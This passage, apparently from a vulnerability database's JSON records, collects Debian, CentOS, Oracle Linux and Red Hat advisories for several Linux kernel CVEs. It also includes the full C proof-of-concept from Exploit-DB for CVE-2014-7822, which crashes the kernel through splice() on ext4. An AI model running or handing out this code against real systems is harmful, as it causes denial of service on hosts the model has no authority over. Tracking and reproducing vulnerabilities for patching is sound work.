Andy Lutomirski discovered that address randomisation for the vDSO\r\n in 64-bit processes is extremely biased. A local unprivileged user\r\n could potentially use this flaw to bypass the ASLR protection\r\n mechanism.\r\n\r\nCVE-2014-9683\r\n\r\n Dmitry Chernenkov discovered that eCryptfs writes past the end of\r\n the allocated buffer during encrypted filename decoding, resulting\r\n in local denial of service.\r\n\r\nCVE-2015-0239\r\n\r\n It was found that KVM did not correctly emulate the x86 SYSENTER\r\n instruction. An unprivileged user within a guest system that has\r\n not enabled SYSENTER, for example because the emulated CPU vendor\r\n is AMD, could potentially use this flaw to cause a denial of\r\n service or privilege escalation in that guest.\r\n\r\nCVE-2015-1420\r\n\r\n It was discovered that the open_by_handle_at() system call reads\r\n the handle size from user memory a second time after validating\r\n it. A local user with the CAP_DAC_READ_SEARCH capability could use\r\n this flaw for privilege escalation.\r\n\r\nCVE-2015-1421\r\n\r\n It was found that the SCTP implementation could free an\r\n authentication state while it was still in use, resulting in heap\r\n corruption. This could allow remote users to cause a denial of\r\n service or privilege escalation.\r\n\r\nCVE-2015-1593\r\n\r\n It was found that address randomisation for the initial stack in\r\n 64-bit processes was limited to 20 rather than 22 bits of entropy.\r\n A local unprivileged user could potentially use this flaw to\r\n bypass the ASLR protection mechanism.\r\n\r\nFor the stable distribution (wheezy), these problems have been fixed in\r\nversion 3.2.65-1+deb7u2. Additionally this update fixes regressions\r\nintroduced in versions 3.2.65-1 and 3.2.65-1+deb7u1.\r\n\r\nFor the upcoming stable distribution (jessie), these problems will be fixed\r\nsoon (a subset is fixed already).\r\n\r\nFor the unstable distribution (sid), these problems will be fixed soon\r\n(a subset is fixed already).\r\n\r\nWe recommend that you upgrade your linux packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1\r\n\r\niQIcBAEBAgAGBQJU62ZxAAoJEBDCk7bDfE42ii8P/0HlB7eLQP9bg46DAQfg6mzi\r\nQrLP3IbL/T3xtE9mbNDYSJ+5ndKdDEwZ73iFt+2lWsBu9Xmyyq0866NWc054jIV7\r\nhXrHb4gohrl1ZsShfPrq0ZwcMpg+nc9lLMTson2VXHDFV9LViI7NV1cjykQv+/FV\r\n9n5sfzDhsSPaI8tjzy6AU0ThKTfGFDXK64zBHuKRRO1WSQwcFtdFs05R6BS5VWrT\r\nwA/TT319syn9FCacMmnGkre00nCZyHsws4B2TAsiVdXPVeaOpHOxmRJIF+P6FOqE\r\nkkj7uxdyc2xPCupVmQghv37cgI4hnEBiAMyr4GtyDqnSEKpLgDGtLmkzd1dxyh3t\r\nteMIqbbvKpVqCeXnBbzWZzQBMNM8E9cx7tM0zxflc6GLMhenlTWqyDqLUPVxNnCW\r\nj0M3nI55a7Tcn3cTOce5+HOGUUfMyHnM81tUP8akr9EkzL3PKDbE5099yD2USa3W\r\ng4OLs6sm4YSrp0nGVvuFT5J/avrL3RtEojCc6oiHpKagjDj42B3hLPnea4fusdzd\r\nMe0m3HSkOSi5Y/9Bi7imLIGwmDpb+p/OKXGWwKwEQc8yH/cx30my6VSX0V+3meNN\r\nqv/aKaTZOEI35pS3qrC0EyP+J3bJbq0oKM/wce/lykXgeCQ+5yYZlN5wYbdelKiC\r\nlP51Rd4fMF4PWh9NyqxG\r\n=ICMx\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2015-03-07T00:00:00", "published": "2015-03-07T00:00:00", "id": "SECURITYVULNS:DOC:31766", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31766", "title": "[SECURITY] [DSA 3170-1] linux security update", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:59", "bulletinFamily": "software", "cvelist": ["CVE-2014-9644", "CVE-2014-7822", "CVE-2015-1420", "CVE-2015-1593", "CVE-2014-8160", "CVE-2015-1421", "CVE-2015-1465", "CVE-2014-8159", "CVE-2014-8559", "CVE-2015-0239", "CVE-2013-7421", "CVE-2014-9584", "CVE-2014-9683", "CVE-2014-9585"], "description": "DoS, information disclosure, privilege escalation.", "edition": 1, "modified": "2015-03-15T00:00:00", "published": "2015-03-15T00:00:00", "id": "SECURITYVULNS:VULN:14292", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14292", "title": "Linux kernel multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-04T04:14:16", "description": "Linux Kernel splice() System Call - Local DoS. CVE-2014-7822. Dos exploit for linux platform", "published": "2015-04-13T00:00:00", "type": "exploitdb", "title": "Linux Kernel splice System Call - Local DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7822"], "modified": "2015-04-13T00:00:00", "id": "EDB-ID:36743", "href": "https://www.exploit-db.com/exploits/36743/", "sourceData": "/* ----------------------------------------------------------------------------------------------------\r\n * cve-2014-7822_poc.c\r\n * \r\n * The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file\r\n * which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call, \r\n * as demonstrated by use of a file descriptor associated with an ext4 filesystem. \r\n *\r\n * \r\n * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.\r\n * Works on ext4 filesystem\r\n * Tested on Ubuntu with 3.13 and 3.14 kernels\r\n * \r\n * Compile with gcc -fno-stack-protector -Wall -o cve-2014-7822_poc cve-2014-7822_poc.c \r\n * \r\n * \r\n * Emeric Nasi - www.sevagas.com\r\n *-----------------------------------------------------------------------------------------------------*/\r\n\r\n\r\n/* ----------------------- Includes ----------------------------*/\r\n\r\n#define _GNU_SOURCE\r\n#include <fcntl.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <limits.h>\r\n\r\n#define EXPLOIT_NAME \"cve-2014-7822\"\r\n#define EXPLOIT_TYPE DOS\r\n\r\n#define JUNK_SIZE 30000\r\n\r\n/* ----------------------- functions ----------------------------*/\r\n\r\n\r\n/* Useful:\r\n * \r\n+============+===============================+===============================+\r\n| \\ File flag| | |\r\n| \\ | !EXT4_EXTENTS_FL | EXT4_EXTETNS_FL |\r\n|Fs Features\\| | |\r\n+------------+-------------------------------+-------------------------------+\r\n| !extent | write: 2194719883264 | write: -------------- |\r\n| | seek: 2199023251456 | seek: -------------- |\r\n+------------+-------------------------------+-------------------------------+\r\n| extent | write: 4402345721856 | write: 17592186044415 |\r\n| | seek: 17592186044415 | seek: 17592186044415 |\r\n+------------+-------------------------------+-------------------------------+\r\n*/\r\n\r\n\r\n/**\r\n * Poc for cve_2014_7822 vulnerability\r\n */\r\nint main()\r\n{\r\n int pipefd[2];\r\n int result;\r\n int in_file;\r\n int out_file;\r\n int zulHandler;\r\n loff_t viciousOffset = 0;\r\n \r\n char junk[JUNK_SIZE] ={0};\r\n \r\n result = pipe(pipefd);\r\n \r\n // Create and clear zug.txt and zul.txt files\r\n system(\"cat /dev/null > zul.txt\");\r\n system(\"cat /dev/null > zug.txt\");\r\n \r\n // Fill zul.txt with A\r\n zulHandler = open(\"zul.txt\", O_RDWR);\r\n memset(junk,'A',JUNK_SIZE);\r\n write(zulHandler, junk, JUNK_SIZE);\r\n close(zulHandler);\r\n\r\n //put content of zul.txt in pipe\r\n viciousOffset = 0;\r\n in_file = open(\"zul.txt\", O_RDONLY);\r\n result = splice(in_file, 0, pipefd[1], NULL, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE);\r\n close(in_file);\r\n \r\n\r\n // Put content of pipe in zug.txt\r\n out_file = open(\"zug.txt\", O_RDWR); \r\n viciousOffset = 118402345721856; // Create 108 tera byte file... can go up as much as false 250 peta byte ext4 file size!!\r\n printf(\"[cve_2014_7822]: ViciousOffset = %lu\\n\", (unsigned long)viciousOffset);\r\n \r\n result = splice(pipefd[0], NULL, out_file, &viciousOffset, JUNK_SIZE , SPLICE_F_MORE | SPLICE_F_MOVE); //8446744073709551615\r\n if (result == -1)\r\n {\r\n printf(\"[cve_2014_7822 error]: %d - %s\\n\", errno, strerror(errno));\r\n exit(1);\r\n }\r\n close(out_file);\r\n\r\n close(pipefd[0]);\r\n close(pipefd[1]);\r\n \r\n \r\n //Open zug.txt \r\n in_file = open(\"zug.txt\", O_RDONLY);\r\n close(in_file);\r\n \r\n printf(\"[cve_2014_7822]: POC triggered, ... system will panic after some time\\n\");\r\n \r\n return 0;\r\n}\r\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/36743/"}], "centos": [{"lastseen": "2019-12-20T18:26:25", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7822"], "description": "**CentOS Errata and Security Advisory** CESA-2015:0164\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's splice() system call\nvalidated its parameters. On certain file systems, a local, unprivileged\nuser could use this flaw to write past the maximum file size, and thus\ncrash the system. (CVE-2014-7822, Moderate)\n\nRed Hat would like to thank Akira Fujita of NEC for reporting this issue.\n\nThis update also fixes the following bugs:\n\n* Previously, hot-unplugging of a virtio-blk device could in some cases\nlead to a kernel panic, for example during in-flight I/O requests.\nThis update fixes race condition in the hot-unplug code in the\nvirtio_blk.ko module. As a result, hot unplugging of the virtio-blk device\nno longer causes the guest kernel oops when there are in-flight I/O\nrequests. (BZ#1006536)\n\n* Before this update, due to a bug in the error-handling path, a corrupted\nmetadata block could be used as a valid block. With this update, the error\nhandling path has been fixed and more checks have been added to verify the\nmetadata block. Now, when a corrupted metadata block is encountered, it is\nproperly marked as corrupted and handled accordingly. (BZ#1034403)\n\n* Previously, an incorrectly initialized variable resulted in a random\nvalue being stored in the variable that holds the number of default ACLs,\nand is sent in the SET_PATH_INFO data structure. Consequently, the setfacl\ncommand could, under certain circumstances, fail with an \"Invalid argument\"\nerror. With this update, the variable is correctly initialized to zero,\nthus fixing the bug. (BZ#1105625)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-February/032970.html\n\n**Affected packages:**\nkernel\nkernel-PAE\nkernel-PAE-devel\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-xen\nkernel-xen-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0164.html", "edition": 3, "modified": "2015-02-11T05:47:40", "published": "2015-02-11T05:47:40", "href": "http://lists.centos.org/pipermail/centos-announce/2015-February/032970.html", "id": "CESA-2015:0164", "title": "kernel security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:26:54", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1421", "CVE-2014-8159"], "description": "**CentOS Errata and Security Advisory** CESA-2015:0726\n\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's Infiniband subsystem did not\nproperly sanitize input parameters while registering memory regions from\nuser space via the (u)verbs API. A local user with access to a\n/dev/infiniband/uverbsX device could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-8159,\nImportant)\n\n* A use-after-free flaw was found in the way the Linux kernel's SCTP\nimplementation handled authentication key reference counting during INIT\ncollisions. A remote attacker could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2015-1421,\nImportant)\n\nRed Hat would like to thank Mellanox for reporting the CVE-2014-8159 issue.\nThe CVE-2015-1421 issue was discovered by Sun Baoliang of Red Hat.\n\nThis update also fixes the following bugs:\n\n* In certain systems with multiple CPUs, when a crash was triggered on one\nCPU with an interrupt handler and this CPU sent Non-Maskable Interrupt\n(NMI) to another CPU, and, at the same time, ioapic_lock had already been\nacquired, a deadlock occurred in ioapic_lock. As a consequence, the kdump\nservice could become unresponsive. This bug has been fixed and kdump now\nworks as expected. (BZ#1197742)\n\n* On Lenovo X1 Carbon 3rd Gen, X250, and T550 laptops, the thinkpad_acpi\nmodule was not properly loaded, and thus the function keys and radio\nswitches did not work. This update applies a new string pattern of BIOS\nversion, which fixes this bug, and function keys and radio switches now\nwork as intended. (BZ#1197743)\n\n* During a heavy file system load involving many worker threads, all worker\nthreads in the pool became blocked on a resource, and no manager thread\nexisted to create more workers. As a consequence, the running processes\nbecame unresponsive. With this update, the logic around manager creation\nhas been changed to assure that the last worker thread becomes a manager\nthread and does not start executing work items. Now, a manager thread\nexists, spawns new workers as needed, and processes no longer hang.\n(BZ#1197744)\n\n* If a thin-pool's metadata enters read-only or fail mode, for example, due\nto thin-pool running out of metadata or data space, any attempt to make\nmetadata changes such as creating a thin device or snapshot thin device\nshould error out cleanly. However, previously, the kernel code returned\nverbose and alarming error messages to the user. With this update, due to\nearly trapping of attempt to make metadata changes, informative errors are\ndisplayed, no longer unnecessarily alarming the user. (BZ#1197745)\n\n* When running Red Hat Enterprise Linux as a guest on Microsoft Hyper-V\nhypervisor, the storvsc module did not return the correct error code for\nthe upper level Small Computer System Interface (SCSI) subsystem. As a\nconsequence, a SCSI command failed and storvsc did not handle such a\nfailure properly under some conditions, for example, when RAID devices were\ncreated on top of storvsc devices. An upstream patch has been applied to\nfix this bug, and storvsc now returns the correct error code in the\ndescribed situation. (BZ#1197749)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-April/033062.html\n\n**Affected packages:**\nkernel\nkernel-abi-whitelists\nkernel-debug\nkernel-debug-devel\nkernel-devel\nkernel-doc\nkernel-headers\nkernel-tools\nkernel-tools-libs\nkernel-tools-libs-devel\nperf\npython-perf\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-0726.html", "edition": 4, "modified": "2015-04-01T03:22:51", "published": "2015-04-01T03:22:51", "href": "http://lists.centos.org/pipermail/centos-announce/2015-April/033062.html", "id": "CESA-2015:0726", "title": "kernel, perf, python security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2020-12-30T19:22:08", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7822"], "description": "kernel\n[2.6.18-402.0.0.0.1]\n- [net] fix tcp_trim_head() (James Li) [orabug 14512145, 19219078]\n- ocfs2: dlm: fix recovery hung (Junxiao Bi) [orabug 13956772]\n- i386: fix MTRR code (Zhenzhong Duan) [orabug 15862649]\n- [oprofile] x86, mm: Add __get_user_pages_fast() [orabug 14277030]\n- [oprofile] export __get_user_pages_fast() function [orabug 14277030]\n- [oprofile] oprofile, x86: Fix nmi-unsafe callgraph support [orabug 14277030]\n- [oprofile] oprofile: use KM_NMI slot for kmap_atomic [orabug 14277030]\n- [oprofile] oprofile: i386 add get_user_pages_fast support [orabug 14277030]\n- [kernel] Initialize the local uninitialized variable stats. [orabug 14051367]\n- [fs] JBD:make jbd support 512B blocks correctly for ocfs2. [orabug 13477763]\n- [x86 ] fix fpu context corrupt when preempt in signal context [orabug 14038272]\n- [mm] fix hugetlb page leak (Dave McCracken) [orabug 12375075]\n- fix ia64 build error due to add-support-above-32-vcpus.patch(Zhenzhong Duan)\n- [x86] use dynamic vcpu_info remap to support more than 32 vcpus (Zhenzhong Duan)\n- [x86] Fix lvt0 reset when hvm boot up with noapic param\n- [scsi] remove printk's when doing I/O to a dead device (John Sobecki, Chris Mason)\n [orabug 12342275]\n- [char] ipmi: Fix IPMI errors due to timing problems (Joe Jin) [orabug 12561346]\n- [scsi] Fix race when removing SCSI devices (Joe Jin) [orabug 12404566]\n- [net] net: Redo the broken redhat netconsole over bonding (Tina Yang) [orabug 12740042]\n- [fs] nfs: Fix __put_nfs_open_context() NULL pointer panic (Joe Jin) [orabug 12687646]\n- fix filp_close() race (Joe Jin) [orabug 10335998]\n- make xenkbd.abs_pointer=1 by default [orabug 67188919]\n- [xen] check to see if hypervisor supports memory reservation change\n (Chuck Anderson) [orabug 7556514]\n- [net] Enable entropy for bnx2,bnx2x,e1000e,igb,ixgb,ixgbe,ixgbevf (John Sobecki)\n [orabug 10315433]\n- [NET] Add xen pv netconsole support (Tina Yang) [orabug 6993043] [bz 7258]\n- [mm] Patch shrink_zone to yield during severe mempressure events, avoiding\n hangs and evictions (John Sobecki,Chris Mason) [orabug 6086839]\n- [mm] Enhance shrink_zone patch allow full swap utilization, and also be\n NUMA-aware (John Sobecki,Chris Mason,Herbert van den Bergh) [orabug 9245919]\n- fix aacraid not to reset during kexec (Joe Jin) [orabug 8516042]\n- [xen] PVHVM guest with PoD crashes under memory pressure (Chuck Anderson)\n [orabug 9107465]\n- [xen] PV guest with FC HBA hangs during shutdown (Chuck Anderson)\n [orabug 9764220]\n- Support 256GB+ memory for pv guest (Mukesh Rathor) [orabug 9450615]\n- fix overcommit memory to use percpu_counter for (KOSAKI Motohiro,\n Guru Anbalagane) [orabug 6124033]\n- [ipmi] make configurable timeouts for kcs of ipmi [orabug 9752208]\n- [ib] fix memory corruption (Andy Grover) [orabug 9972346]\n- [usb] USB: fix __must_check warnings in drivers/usb/core/ (Junxiao Bi) [orabug 14795203]\n- [usb] usbcore: fix refcount bug in endpoint removal (Junxiao Bi) [orabug 14795203]", "edition": 6, "modified": "2015-02-11T00:00:00", "published": "2015-02-11T00:00:00", "id": "ELSA-2015-0164-1", "href": "http://linux.oracle.com/errata/ELSA-2015-0164-1.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:31", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1421"], "description": "kernel-uek\n[2.6.32-400.37.3]\n- net: sctp: fix slab corruption from use after free on INIT collisions (Daniel Borkmann) [Orabug: 20780349] {CVE-2015-1421}", "edition": 4, "modified": "2015-03-31T00:00:00", "published": "2015-03-31T00:00:00", "id": "ELSA-2015-3021", "href": "http://linux.oracle.com/errata/ELSA-2015-3021.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:04", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7822", "CVE-2014-9322"], "description": "kernel\n[2.6.18-402]\n- [block] virtio: Reset device after blk_cleanup_queue() (Stefan Hajnoczi) [1006536]\n- [block] virtio: Call del_gendisk() before disable guest kick (Stefan Hajnoczi) [1006536]\n- [block] virtio: Drop unused request tracking list (Stefan Hajnoczi) [1006536]\n- [fs] cifs: setfacl removes part of ACL when setting POSIX ACLs (Sachin Prabhu) [1105625]\n- [fs] splice: perform generic write checks (Eric Sandeen) [1155908] {CVE-2014-7822}\n- [fs] ext4: verify block bitmap (Lukas Czerner) [1034403]\n- [fs] ext4: fix type declaration of ext4_validate_block_bitmap (Lukas Czerner) [1034403]\n- [fs] ext4: error out if verifying the block bitmap fails (Lukas Czerner) [1034403]\n- [x86] traps: stop using IST for #SS (Petr Matousek) [1172809] {CVE-2014-9322}\n[2.6.18-401]\n- [net] rds: fix possible double free on sock tear down (Herton R. Krzesinski) [1116880]", "edition": 4, "modified": "2015-02-11T00:00:00", "published": "2015-02-11T00:00:00", "id": "ELSA-2015-0164", "href": "http://linux.oracle.com/errata/ELSA-2015-0164.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:34", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1421", "CVE-2014-8159"], "description": "[3.10.0-229.1.2]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-229.1.2]\n- [infiniband] core: Prevent integer overflow in ib_umem_get address arithmetic (Doug Ledford) [1181177 1179347] {CVE-2014-8159}\n[3.10.0-229.1.1]\n- [crypto] testmgr: mark rfc4106(gcm(aes)) as fips_allowed (Jarod Wilson) [1197751 1185400]\n- [virt] storvsc: ring buffer failures may result in I/O freeze (Vitaly Kuznetsov) [1197749 1171409]\n- [md] dm-thin: don't allow messages to be sent to a pool target in READ_ONLY or FAIL mode (Mike Snitzer) [1197745 1184592]\n- [kernel] workqueue: fix subtle pool management issue which can stall whole worker_pool (Eric Sandeen) [1197744 1165535]\n- [platform] thinkpad_acpi: support new BIOS version string pattern (Benjamin Tissoires) [1197743 1194830]\n- [x86] ioapic: kcrash: Prevent crash_kexec() from deadlocking on ioapic_lock (Baoquan He) [1197742 1182424]\n- [net] sctp: fix slab corruption from use after free on INIT collisions (Daniel Borkmann) [1196588 1183959] {CVE-2015-1421}", "edition": 4, "modified": "2015-03-26T00:00:00", "published": "2015-03-26T00:00:00", "id": "ELSA-2015-0726", "href": "http://linux.oracle.com/errata/ELSA-2015-0726.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:24", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3339", "CVE-2015-0239", "CVE-2014-9683"], "description": "kernel-uek\n[3.8.13-68.3.5]\n- KVM: x86: SYSENTER emulation is broken (Nadav Amit) [Orabug: 21502739] {CVE-2015-0239} {CVE-2015-0239}\n- fs: take i_mutex during prepare_binprm for set[ug]id executables (Jann Horn) [Orabug: 21502254] {CVE-2015-3339}\n- eCryptfs: Remove buggy and unnecessary write in file name decode routine (Michael Halcrow) [Orabug: 21502065] {CVE-2014-9683}", "edition": 4, "modified": "2015-07-29T00:00:00", "published": "2015-07-29T00:00:00", "id": "ELSA-2015-3053", "href": "http://linux.oracle.com/errata/ELSA-2015-3053.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:38", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7822"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's splice() system call\nvalidated its parameters. On certain file systems, a local, unprivileged\nuser could use this flaw to write past the maximum file size, and thus\ncrash the system. (CVE-2014-7822, Moderate)\n\nRed Hat would like to thank Akira Fujita of NEC for reporting this issue.\n\nThis update also fixes the following bugs:\n\n* Previously, hot-unplugging of a virtio-blk device could in some cases\nlead to a kernel panic, for example during in-flight I/O requests.\nThis update fixes race condition in the hot-unplug code in the\nvirtio_blk.ko module. As a result, hot unplugging of the virtio-blk device\nno longer causes the guest kernel oops when there are in-flight I/O\nrequests. (BZ#1006536)\n\n* Before this update, due to a bug in the error-handling path, a corrupted\nmetadata block could be used as a valid block. With this update, the error\nhandling path has been fixed and more checks have been added to verify the\nmetadata block. Now, when a corrupted metadata block is encountered, it is\nproperly marked as corrupted and handled accordingly. (BZ#1034403)\n\n* Previously, an incorrectly initialized variable resulted in a random\nvalue being stored in the variable that holds the number of default ACLs,\nand is sent in the SET_PATH_INFO data structure. Consequently, the setfacl\ncommand could, under certain circumstances, fail with an \"Invalid argument\"\nerror. With this update, the variable is correctly initialized to zero,\nthus fixing the bug. (BZ#1105625)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "modified": "2017-09-08T12:10:27", "published": "2015-02-10T05:00:00", "id": "RHSA-2015:0164", "href": "https://access.redhat.com/errata/RHSA-2015:0164", "type": "redhat", "title": "(RHSA-2015:0164) Moderate: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:19", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1421"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's SCTP\nimplementation handled authentication key reference counting during INIT\ncollisions. A remote attacker could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2015-1421,\nImportant)\n\nThis issue was discovered by Sun Baoliang of Red Hat.\n\nThis update also fixes the following bugs:\n\n* When ARP is disabled on an interface with an ARP entry for a neighbor\nhost present in the ARP cache, letting the cached entry expire and\nattempting to communicate with that neighbor host could cause the host MAC\naddress to not be resolved correctly after ARP is enabled again on the\ninterface. With the following workaround, the entry is not expired and the\ndescribed scenario works correctly:\n\n1) Add the maximum number of ARP entries you expect for your configuration\nto the proc/sys/net/ipv4/neigh/default/gc_thresh file.\n\n2) Ensure that relevant IP addresses are put in the ARP cache when the\nsystem boots, for example by executing the following two commands:\n\nping [IP address] -c 1\nifconfig ethX -arp\n\n(BZ#1207350)\n\n* Previously, the open() system call in some cases failed with an EBUSY\nerror if the opened file was also being renamed at the same time. With this\nupdate, the kernel automatically retries open() when this failure occurs,\nand if the retry is not successful either, open() now fails with an ESTALE\nerror. (BZ#1207813)\n\n* Previously, a race condition occurred in the build_id_cache__add_s()\nfunction, which could truncate system files. A patch has been provided to\nfix this bug, and system files are no longer truncated in the\naforementioned scenario. (BZ#1210591)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "modified": "2015-05-27T19:14:31", "published": "2015-05-27T04:00:00", "id": "RHSA-2015:1030", "href": "https://access.redhat.com/errata/RHSA-2015:1030", "type": "redhat", "title": "(RHSA-2015:1030) Important: kernel security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:39", "bulletinFamily": "unix", "cvelist": ["CVE-2014-8159", "CVE-2015-1421"], "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's Infiniband subsystem did not\nproperly sanitize input parameters while registering memory regions from\nuser space via the (u)verbs API. A local user with access to a\n/dev/infiniband/uverbsX device could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-8159,\nImportant)\n\n* A use-after-free flaw was found in the way the Linux kernel's SCTP\nimplementation handled authentication key reference counting during INIT\ncollisions. A remote attacker could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2015-1421,\nImportant)\n\nRed Hat would like to thank Mellanox for reporting the CVE-2014-8159 issue.\nThe CVE-2015-1421 issue was discovered by Sun Baoliang of Red Hat.\n\nThe MRG-Realtime 3.10 kernel-rt sources have been updated to include the\nfollowing bug fixes:\n\n* The kdump service could become unresponsive due to a deadlock in the\nkernel call ioapic_lock.\n\n* Attempt to make metadata changes such as creating a thin device or\nsnapshot thin device did not error out cleanly.\n\n(BZ#1201384)\n\nThis update also fixes the following bug:\n\n* The MRG kernel scheduler code was missing checks for the PREEMPT_LAZY\nflag allowing tasks to be preempted more times than necessary causing\nlatency spikes on the system. Additional checks for the PREEMPT_LAZY flag\nwere added to the check_preempt_wakeup() and check_preempt_curr() functions\nin the scheduler code so that preempt wakeups were reduced and these\nlatency spikes were removed. (BZ#1157949)\n\nAll kernel-rt users are advised to upgrade to these updated packages, which\ncorrect these issues. The system must be rebooted for this update to take\neffect.\n", "modified": "2018-06-07T08:58:25", "published": "2015-03-30T04:00:00", "id": "RHSA-2015:0751", "href": "https://access.redhat.com/errata/RHSA-2015:0751", "type": "redhat", "title": "(RHSA-2015:0751) Important: kernel-rt security and bug fix update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:37", "bulletinFamily": "unix", "cvelist": ["CVE-2014-8159", "CVE-2015-1421"], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* It was found that the Linux kernel's Infiniband subsystem did not\nproperly sanitize input parameters while registering memory regions from\nuser space via the (u)verbs API. A local user with access to a\n/dev/infiniband/uverbsX device could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2014-8159,\nImportant)\n\n* A use-after-free flaw was found in the way the Linux kernel's SCTP\nimplementation handled authentication key reference counting during INIT\ncollisions. A remote attacker could use this flaw to crash the system or,\npotentially, escalate their privileges on the system. (CVE-2015-1421,\nImportant)\n\nRed Hat would like to thank Mellanox for reporting the CVE-2014-8159 issue.\nThe CVE-2015-1421 issue was discovered by Sun Baoliang of Red Hat.\n\nThis update also fixes the following bugs:\n\n* In certain systems with multiple CPUs, when a crash was triggered on one\nCPU with an interrupt handler and this CPU sent Non-Maskable Interrupt\n(NMI) to another CPU, and, at the same time, ioapic_lock had already been\nacquired, a deadlock occurred in ioapic_lock. As a consequence, the kdump\nservice could become unresponsive. This bug has been fixed and kdump now\nworks as expected. (BZ#1197742)\n\n* On Lenovo X1 Carbon 3rd Gen, X250, and T550 laptops, the thinkpad_acpi\nmodule was not properly loaded, and thus the function keys and radio\nswitches did not work. This update applies a new string pattern of BIOS\nversion, which fixes this bug, and function keys and radio switches now\nwork as intended. (BZ#1197743)\n\n* During a heavy file system load involving many worker threads, all worker\nthreads in the pool became blocked on a 